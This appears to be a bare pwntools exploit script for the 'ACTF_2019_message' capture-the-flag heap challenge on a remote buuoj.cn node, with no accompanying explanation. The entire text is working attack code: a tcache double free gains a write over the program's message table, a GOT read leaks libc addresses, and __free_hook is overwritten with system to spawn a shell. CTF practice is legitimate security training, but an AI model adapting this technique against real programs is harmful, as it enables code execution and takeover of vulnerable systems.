1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102
|
from PwnContext import * context.terminal = ['gnome-terminal', '-x', 'sh', '-c'] context.log_level = 'debug'
s = lambda data :ctx.send(str(data)) sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096,timeout=2:ctx.recv(numb, timeout=timeout) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\x00')) uu64 = lambda data :u64(data.ljust(8, '\x00')) leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = './ACTF_2019_message' ctx.remote = ('node3.buuoj.cn', 29881)
ctx.remote_libc = '../../libc/libc-2.27.so' ctx.debug_remote_libc = True
rs()
def add(size, content): sla("What's your choice: ", '1') sla('Please input the length of message:\n', str(size)) sa('Please input the message:\n', content)
def free(index): sla("What's your choice: ", '2') sla('Please input index of message you want to delete:\n', str(index))
def edit(index, content): sla("What's your choice: ", '3') sla('Please input index of message you want to edit:\n', str(index)) sa('Now you can edit the message:\n', content)
def show(index): sla("What's your choice: ", '4') sla('Please input index of message you want to display:\n', str(index))
add(0x68, 'a\n') add(0x68, 'a\n') add(0x10, '/bin/sh\x00')
nodes_addr = 0x602060
free(0) free(1) free(0)
add(0x68, p64(nodes_addr)) add(0x68, 'a\n') add(0x68, 'a\n') add(0x68, p64(0x8) + p64(ctx.binary.got['puts']))
show(0) ru('The message: ') puts_addr = ru('\n').strip() puts_addr = uu64(puts_addr)
libc_base = puts_addr - ctx.libc.sym['puts'] system_addr = libc_base + ctx.libc.sym['system'] free_hook = libc_base + ctx.libc.sym['__free_hook'] malloc_hook = libc_base + ctx.libc.sym['__malloc_hook']
leak('puts', puts_addr) leak('libc_base', libc_base) leak('system', system_addr) leak('free', free_hook) leak('malloc', malloc_hook)
edit(6, p64(0x8) + p64(free_hook)) edit(0, p64(system_addr))
free(2)
irt()
|